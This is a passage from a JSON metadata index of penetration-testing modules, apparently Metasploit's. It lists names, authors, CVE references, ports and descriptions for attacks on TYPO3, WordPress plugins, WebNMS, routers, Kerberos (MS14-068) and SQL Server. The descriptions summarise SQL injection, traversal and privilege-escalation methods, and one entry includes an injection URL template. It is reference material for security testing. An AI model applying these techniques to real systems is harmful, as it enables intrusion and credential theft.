"URL-http://tomcat.apache.org/",
"OSVDB-47464",
"OSVDB-73447",
"CVE-2008-2938",
"URL-http://www.securityfocus.com/archive/1/499926",
"EDB-17388",
"BID-48225"
],
"platform": "",
"arch": "",
"rport": 8443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb",
"is_install_path": true,
"ref_name": "admin/http/trendmicro_dlp_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/typo3_news_module_sqli": {
"name": "TYPO3 News Module SQL Injection",
"full_name": "auxiliary/admin/http/typo3_news_module_sqli",
"rank": 300,
"disclosure_date": "2017-04-06",
"type": "auxiliary",
"author": [
"Marco Rivoli",
"Charles Fol"
],
"description": "This module exploits a SQL Injection vulnerability In TYPO3 NewsController.php\n in the news module 5.3.2 and earlier. It allows an unauthenticated user to execute arbitrary\n SQL commands via vectors involving overwriteDemand and OrderByAllowed. The SQL injection\n can be used to obtain password hashes for application user accounts. This module has been\n tested on TYPO3 3.16.0 running news extension 5.0.0.\n\n This module tries to extract username and password hash of the administrator user.\n It tries to inject sql and check every letter of a pattern, to see\n if it belongs to the username or password it tries to alter the ordering of results. If\n the letter doesn't belong to the word being extracted then all results are inverted\n (News #2 appears before News #1, so Pattern2 before Pattern1), instead if the letter belongs\n to the word being extracted then the results are in proper order (News #1 appears before News #2,\n so Pattern1 before Pattern2)",
"references": [
"CVE-2017-7581",
"URL-http://www.ambionics.io/blog/typo3-news-module-sqli"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-03-15 10:46:08 +0000",
"path": "/modules/auxiliary/admin/http/typo3_news_module_sqli.rb",
"is_install_path": true,
"ref_name": "admin/http/typo3_news_module_sqli",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/typo3_sa_2009_001": {
"name": "TYPO3 sa-2009-001 Weak Encryption Key File Disclosure",
"full_name": "auxiliary/admin/http/typo3_sa_2009_001",
"rank": 300,
"disclosure_date": "2009-01-20",
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module exploits a flaw in TYPO3 encryption ey creation process to allow for\n file disclosure in the jumpUrl mechanism. This flaw can be used to read any file\n that the web server user account has access to view.",
"references": [
"CVE-2009-0255",
"OSVDB-51536",
"URL-http://blog.c22.cc/advisories/typo3-sa-2009-001",
"URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-001/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/admin/http/typo3_sa_2009_001.rb",
"is_install_path": true,
"ref_name": "admin/http/typo3_sa_2009_001",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/typo3_sa_2009_002": {
"name": "Typo3 sa-2009-002 File Disclosure",
"full_name": "auxiliary/admin/http/typo3_sa_2009_002",
"rank": 300,
"disclosure_date": "2009-02-10",
"type": "auxiliary",
"author": [
"spinbad <spinbad.security@googlemail.com>"
],
"description": "This module exploits a file disclosure vulnerability in the jumpUrl mechanism of\n Typo3. This flaw can be used to read any file that the web server user account has\n access to.",
"references": [
"OSVDB-52048",
"CVE-2009-0815",
"URL-http://secunia.com/advisories/33829/",
"EDB-8038",
"URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/typo3_sa_2009_002.rb",
"is_install_path": true,
"ref_name": "admin/http/typo3_sa_2009_002",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/typo3_sa_2010_020": {
"name": "TYPO3 sa-2010-020 Remote File Disclosure",
"full_name": "auxiliary/admin/http/typo3_sa_2010_020",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley",
"Gregor Kopf"
],
"description": "This module exploits a flaw in the way the TYPO3 jumpurl feature matches hashes.\n Due to this flaw a Remote File Disclosure is possible by matching the juhash of 0.\n This flaw can be used to read any file that the web server user account has access to view.",
"references": [
"CVE-2010-3714",
"URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020",
"URL-http://gregorkopf.de/slides_berlinsides_2010.pdf"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/admin/http/typo3_sa_2010_020.rb",
"is_install_path": true,
"ref_name": "admin/http/typo3_sa_2010_020",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/typo3_winstaller_default_enc_keys": {
"name": "TYPO3 Winstaller Default Encryption Keys",
"full_name": "auxiliary/admin/http/typo3_winstaller_default_enc_keys",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module exploits known default encryption keys found in the TYPO3 Winstaller.\n This flaw allows for file disclosure in the jumpUrl mechanism. This issue can be\n used to read any file that the web server user account has access to view.\n\n The method used to create the juhash (short MD5 hash) was altered in later versions\n of Typo3. Use the show actions command to display and select the version of TYPO3 in\n use (defaults to the older method of juhash creation).",
"references": [
"URL-http://typo3winstaller.sourceforge.net/"
],
"platform": "",
"arch": "",
"rport": 8503,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb",
"is_install_path": true,
"ref_name": "admin/http/typo3_winstaller_default_enc_keys",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/ulterius_file_download": {
"name": "Ulterius Server File Download Vulnerability",
"full_name": "auxiliary/admin/http/ulterius_file_download",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Rick Osgood",
"Jacob Robles"
],
"description": "This module exploits a directory traversal vulnerability in Ulterius Server < v1.9.5.0\n to download files from the affected host. A valid file path is needed to download a file.\n Fortunately, Ulterius indexes every file on the system, which can be stored in the\n following location:\n\n http://ulteriusURL:port/.../fileIndex.db.\n\n This module can download and parse the fileIndex.db file. There is also an option to\n download a file using a provided path.",
"references": [
"EDB-43141",
"CVE-2017-16806"
],
"platform": "",
"arch": "",
"rport": 22006,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-02-15 16:31:09 +0000",
"path": "/modules/auxiliary/admin/http/ulterius_file_download.rb",
"is_install_path": true,
"ref_name": "admin/http/ulterius_file_download",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/vbulletin_upgrade_admin": {
"name": "vBulletin Administrator Account Creation",
"full_name": "auxiliary/admin/http/vbulletin_upgrade_admin",
"rank": 300,
"disclosure_date": "2013-10-09",
"type": "auxiliary",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the \"install/upgrade.php\" component on vBulletin 4.1+ and 4.5+ to\n create a new administrator account, as exploited in the wild on October 2013. This module\n has been tested successfully on vBulletin 4.1.5 and 4.1.0.",
"references": [
"CVE-2013-6129",
"URL-http://blog.imperva.com/2013/10/threat-advisory-a-vbulletin-exploit-administrator-injection.html",
"OSVDB-98370",
"URL-http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-08-24 13:18:32 +0000",
"path": "/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb",
"is_install_path": true,
"ref_name": "admin/http/vbulletin_upgrade_admin",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/webnms_cred_disclosure": {
"name": "WebNMS Framework Server Credential Disclosure",
"full_name": "auxiliary/admin/http/webnms_cred_disclosure",
"rank": 300,
"disclosure_date": "2016-07-04",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module abuses two vulnerabilities in WebNMS Framework Server 5.2 to extract\nall user credentials. The first vulnerability is an unauthenticated file download\nin the FetchFile servlet, which is used to download the file containing the user\ncredentials. The second vulnerability is that the passwords in the file are\nobfuscated with a very weak algorithm which can be easily reversed.\nThis module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on\nWindows and Linux.",
"references": [
"CVE-2016-6601",
"CVE-2016-6602",
"URL-https://blogs.securiteam.com/index.php/archives/2712",
"URL-https://seclists.org/fulldisclosure/2016/Aug/54"
],
"platform": "",
"arch": "",
"rport": 9090,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/webnms_cred_disclosure.rb",
"is_install_path": true,
"ref_name": "admin/http/webnms_cred_disclosure",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/webnms_file_download": {
"name": "WebNMS Framework Server Arbitrary Text File Download",
"full_name": "auxiliary/admin/http/webnms_file_download",
"rank": 300,
"disclosure_date": "2016-07-04",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module abuses a vulnerability in WebNMS Framework Server 5.2 that allows an\nunauthenticated user to download files off the file system by using a directory\ntraversal attack on the FetchFile servlet.\nNote that only text files can be downloaded properly, as any binary file will get\nmangled by the servlet. Also note that for Windows targets you can only download\nfiles that are in the same drive as the WebNMS installation.\nThis module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on\nWindows and Linux.",
"references": [
"CVE-2016-6601",
"URL-https://blogs.securiteam.com/index.php/archives/2712",
"URL-https://seclists.org/fulldisclosure/2016/Aug/54"
],
"platform": "",
"arch": "",
"rport": 9090,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/webnms_file_download.rb",
"is_install_path": true,
"ref_name": "admin/http/webnms_file_download",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/wp_custom_contact_forms": {
"name": "WordPress custom-contact-forms Plugin SQL Upload",
"full_name": "auxiliary/admin/http/wp_custom_contact_forms",
"rank": 300,
"disclosure_date": "2014-08-07",
"type": "auxiliary",
"author": [
"Marc-Alexandre Montpas",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "The WordPress custom-contact-forms plugin <= 5.1.0.3 allows unauthenticated users to download\n a SQL dump of the plugins database tables. It's also possible to upload files containing\n SQL statements which will be executed. The module first tries to extract the WordPress\n table prefix from the dump and then attempts to create a new admin user.",
"references": [
"URL-http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html",
"URL-https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.3&old=997569&new_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.4&new=997569&sfp_email=&sfph_mail=",
"WPVDB-7542"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/wp_custom_contact_forms.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_custom_contact_forms",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/wp_easycart_privilege_escalation": {
"name": "WordPress WP EasyCart Plugin Privilege Escalation",
"full_name": "auxiliary/admin/http/wp_easycart_privilege_escalation",
"rank": 300,
"disclosure_date": "2015-02-25",
"type": "auxiliary",
"author": [
"rastating"
],
"description": "The WordPress WP EasyCart plugin from version 1.1.30 to 3.0.20 allows authenticated\n users of any user level to set any system option via a lack of validation in the\n ec_ajax_update_option and ec_ajax_clear_all_taxrates functions located in\n /inc/admin/admin_ajax_functions.php. The module first changes the admin e-mail address\n to prevent any notifications being sent to the actual administrator during the attack,\n re-enables user registration in case it has been disabled and sets the default role to\n be administrator. This will allow for the user to create a new account with admin\n privileges via the default registration page found at /wp-login.php?action=register.",
"references": [
"CVE-2015-2673",
"WPVDB-7808",
"URL-https://rastating.github.io/wp-easycart-privilege-escalation-information-disclosure/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-10-01 18:59:09 +0000",
"path": "/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_easycart_privilege_escalation",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/wp_gdpr_compliance_privesc": {
"name": "WordPress WP GDPR Compliance Plugin Privilege Escalation",
"full_name": "auxiliary/admin/http/wp_gdpr_compliance_privesc",
"rank": 300,
"disclosure_date": "2018-11-08",
"type": "auxiliary",
"author": [
"Mikey Veenstra (WordFence)",
"Thomas Labadie"
],
"description": "The Wordpress GDPR Compliance plugin <= v1.4.2 allows unauthenticated users to set\n wordpress administration options by overwriting values within the database.\n\n The vulnerability is present in WordPresss admin-ajax.php, which allows unauthorized\n users to trigger handlers and make configuration changes because of a failure to do\n capability checks when executing the 'save_setting' internal action.\n\n WARNING: The module sets Wordpress configuration options without reading their current\n values and restoring them later.",
"references": [
"URL-https://www.wordfence.com/blog/2018/11/privilege-escalation-flaw-in-wp-gdpr-compliance-plugin-exploited-in-the-wild/",
"CVE-2018-19207",
"WPVDB-9144"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-11-29 06:35:37 +0000",
"path": "/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_gdpr_compliance_privesc",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
"SideEffects": [
"config-changes"
]
}
},
"auxiliary_admin/http/wp_google_maps_sqli": {
"name": "WordPress Google Maps Plugin SQL Injection",
"full_name": "auxiliary/admin/http/wp_google_maps_sqli",
"rank": 300,
"disclosure_date": "2019-04-02",
"type": "auxiliary",
"author": [
"Thomas Chauchefoin (Synacktiv)"
],
"description": "This module exploits a SQL injection vulnerability in a REST endpoint\n registered by the WordPress plugin wp-google-maps between 7.11.00 and\n 7.11.17 (included).\n\n As the table prefix can be changed by administrators, set DB_PREFIX\n accordingly.",
"references": [
"CVE-2019-10692",
"WPVDB-9249"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-04-15 07:06:27 +0000",
"path": "/modules/auxiliary/admin/http/wp_google_maps_sqli.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_google_maps_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/wp_symposium_sql_injection": {
"name": "WordPress Symposium Plugin SQL Injection",
"full_name": "auxiliary/admin/http/wp_symposium_sql_injection",
"rank": 300,
"disclosure_date": "2015-08-18",
"type": "auxiliary",
"author": [
"PizzaHatHacker",
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module exploits a SQL injection vulnerability in the WP Symposium plugin\n before 15.8 for WordPress, which allows remote attackers to extract credentials\n via the size parameter to get_album_item.php.",
"references": [
"CVE-2015-6522",
"EDB-37824"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-10-09 17:06:05 +0000",
"path": "/modules/auxiliary/admin/http/wp_symposium_sql_injection.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_symposium_sql_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/wp_wplms_privilege_escalation": {
"name": "WordPress WPLMS Theme Privilege Escalation",
"full_name": "auxiliary/admin/http/wp_wplms_privilege_escalation",
"rank": 300,
"disclosure_date": "2015-02-09",
"type": "auxiliary",
"author": [
"Evex",
"rastating"
],
"description": "The WordPress WPLMS theme from version 1.5.2 to 1.8.4.1 allows an\n authenticated user of any user level to set any system option due to a lack of\n validation in the import_data function of /includes/func.php.\n\n The module first changes the admin e-mail address to prevent any\n notifications being sent to the actual administrator during the attack,\n re-enables user registration in case it has been disabled and sets the default\n role to be administrator. This will allow for the user to create a new account\n with admin privileges via the default registration page found at\n /wp-login.php?action=register.",
"references": [
"WPVDB-7785"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-10-01 18:59:09 +0000",
"path": "/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_wplms_privilege_escalation",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/zyxel_admin_password_extractor": {
"name": "ZyXEL GS1510-16 Password Extractor",
"full_name": "auxiliary/admin/http/zyxel_admin_password_extractor",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Daniel Manser",
"Sven Vetsch"
],
"description": "This module exploits a vulnerability in ZyXEL GS1510-16 routers\n to extract the admin password. Due to a lack of authentication on the\n webctrl.cgi script, unauthenticated attackers can recover the\n administrator password for these devices. The vulnerable device\n has reached end of life for support from the manufacturer, so it is\n unlikely this problem will be addressed.",
"references": [
"URL-https://github.com/rapid7/metasploit-framework/pull/2709"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-10-09 17:06:05 +0000",
"path": "/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb",
"is_install_path": true,
"ref_name": "admin/http/zyxel_admin_password_extractor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/kerberos/ms14_068_kerberos_checksum": {
"name": "MS14-068 Microsoft Kerberos Checksum Validation Vulnerability",
"full_name": "auxiliary/admin/kerberos/ms14_068_kerberos_checksum",
"rank": 300,
"disclosure_date": "2014-11-18",
"type": "auxiliary",
"author": [
"Tom Maddock",
"Sylvain Monne",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in the Microsoft Kerberos implementation. The problem\n exists in the verification of the Privilege Attribute Certificate (PAC) from a Kerberos TGS\n request, where a domain user may forge a PAC with arbitrary privileges, including\n Domain Administrator. This module requests a TGT ticket with a forged PAC and exports it to\n a MIT Kerberos Credential Cache file. It can be loaded on Windows systems with the Mimikatz\n help. It has been tested successfully on Windows 2008.",
"references": [
"CVE-2014-6324",
"MSB-MS14-068",
"OSVDB-114751",
"URL-http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx",
"URL-https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/",
"URL-https://github.com/bidord/pykek",
"URL-https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit"
],
"platform": "",
"arch": "",
"rport": 88,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb",
"is_install_path": true,
"ref_name": "admin/kerberos/ms14_068_kerberos_checksum",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/maxdb/maxdb_cons_exec": {
"name": "SAP MaxDB cons.exe Remote Command Injection",
"full_name": "auxiliary/admin/maxdb/maxdb_cons_exec",
"rank": 300,
"disclosure_date": "2008-01-09",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "SAP MaxDB is prone to a remote command-injection vulnerability\n because the application fails to properly sanitize user-supplied input.",
"references": [
"OSVDB-40210",
"BID-27206",
"CVE-2008-0244"
],
"platform": "",
"arch": "",
"rport": 7210,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb",
"is_install_path": true,
"ref_name": "admin/maxdb/maxdb_cons_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/misc/sercomm_dump_config": {
"name": "SerComm Device Configuration Dump",
"full_name": "auxiliary/admin/misc/sercomm_dump_config",
"rank": 300,
"disclosure_date": "2013-12-31",
"type": "auxiliary",
"author": [
"Eloi Vanderbeken <eloi.vanderbeken@gmail.com>",
"Matt \"hostess\" Andreko <mandreko@accuvant.com>"
],
"description": "This module will dump the configuration of several SerComm devices. These devices\n typically include routers from NetGear and Linksys. This module was tested\n successfully against the NetGear DG834 series ADSL modem router.",
"references": [
"OSVDB-101653",
"URL-https://github.com/elvanderb/TCP-32764"
],
"platform": "",
"arch": "",
"rport": 32764,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/misc/sercomm_dump_config.rb",
"is_install_path": true,
"ref_name": "admin/misc/sercomm_dump_config",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/misc/wol": {
"name": "UDP Wake-On-Lan (WOL)",
"full_name": "auxiliary/admin/misc/wol",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will turn on a remote machine with a network card that\n supports wake-on-lan (or MagicPacket). In order to use this, you must\n know the machine's MAC address in advance. The current default MAC\n address is just an example of how your input should look like.\n\n The password field is optional. If present, it should be in this hex\n format: 001122334455, which is translated to \"0x001122334455\" in binary.\n Note that this should be either 4 or 6 bytes long.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 04:43:37 +0000",
"path": "/modules/auxiliary/admin/misc/wol.rb",
"is_install_path": true,
"ref_name": "admin/misc/wol",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/motorola/wr850g_cred": {
"name": "Motorola WR850G v4.03 Credentials",
"full_name": "auxiliary/admin/motorola/wr850g_cred",
"rank": 300,
"disclosure_date": "2004-09-24",
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Login credentials to the Motorola WR850G router with\n firmware v4.03 can be obtained via a simple GET request\n if issued while the administrator is logged in. A lot\n more information is available through this request, but\n you can get it all and more after logging in.",
"references": [
"CVE-2004-1550",
"OSVDB-10232",
"URL-https://seclists.org/bugtraq/2004/Sep/0339.html"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/motorola/wr850g_cred.rb",
"is_install_path": true,
"ref_name": "admin/motorola/wr850g_cred",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/ms/ms08_059_his2006": {
"name": "Microsoft Host Integration Server 2006 Command Execution Vulnerability",
"full_name": "auxiliary/admin/ms/ms08_059_his2006",
"rank": 300,
"disclosure_date": "2008-10-14",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a command-injection vulnerability in Microsoft Host Integration Server 2006.",
"references": [
"MSB-MS08-059",
"CVE-2008-3466",
"OSVDB-49068",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=745"
],
"platform": "",
"arch": "",
"rport": 0,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/ms/ms08_059_his2006.rb",
"is_install_path": true,
"ref_name": "admin/ms/ms08_059_his2006",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_enum": {
"name": "Microsoft SQL Server Configuration Enumerator",
"full_name": "auxiliary/admin/mssql/mssql_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will perform a series of configuration audits and\n security checks against a Microsoft SQL Server database. For this\n module to work, valid administrative user credentials must be\n supplied.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-08-16 21:40:03 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_enum.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_enum",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_enum_domain_accounts": {
"name": "Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration",
"full_name": "auxiliary/admin/mssql/mssql_enum_domain_accounts",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullbind <scott.sutherland@netspi.com>",
"antti <antti.rantasaari@netspi.com>"
],
"description": "This module can be used to bruteforce RIDs associated with the domain of the SQL Server\n using the SUSER_SNAME function. This is similar to the smb_lookupsid module, but executed\n through SQL Server queries as any user with the PUBLIC role (everyone). Information that\n can be enumerated includes Windows domain users, groups, and computer accounts. Enumerated\n accounts can then be used in online dictionary attacks.",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/ms174427.aspx"
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_enum_domain_accounts",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_enum_domain_accounts_sqli": {
"name": "Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration",
"full_name": "auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullbind <scott.sutherland@netspi.com>",
"antti <antti.rantasaari@netspi.com>"
],
"description": "This module can be used to bruteforce RIDs associated with the domain of the SQL Server\n using the SUSER_SNAME function via Error Based SQL injection. This is similar to the\n smb_lookupsid module, but executed through SQL Server queries as any user with the PUBLIC\n role (everyone). Information that can be enumerated includes Windows domain users, groups,\n and computer accounts. Enumerated accounts can then be used in online dictionary attacks.\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/ms174427.aspx"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_enum_domain_accounts_sqli",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_enum_sql_logins": {
"name": "Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration",
"full_name": "auxiliary/admin/mssql/mssql_enum_sql_logins",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullbind <scott.sutherland@netspi.com>"
],
